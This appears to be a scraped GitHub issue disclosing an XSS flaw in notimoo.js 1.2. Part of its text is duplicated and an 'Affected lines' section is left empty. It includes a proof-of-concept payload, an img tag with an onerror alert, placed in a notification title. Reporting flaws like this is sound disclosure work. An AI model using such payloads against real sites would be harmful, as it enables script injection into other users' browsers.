notimoo.js 1.2 has an XSS vulnerability which is executed when a title or message containing Javascript code are set in a notification.
POC
Create a notification with a javascript payload:
// Showing a simple notification
notimooManager.show({
title: '<img src=x onerror=alert()>',
message: 'This is a sample notitication showing how easy is to use Notimoo.'
});
notimoo.js 1.2 has an XSS vulnerability which is executed when a title or message containing Javascript code are set in a notification.
POC
Create a notification with a javascript payload:
Affected lines:
The text was updated successfully, but these errors were encountered: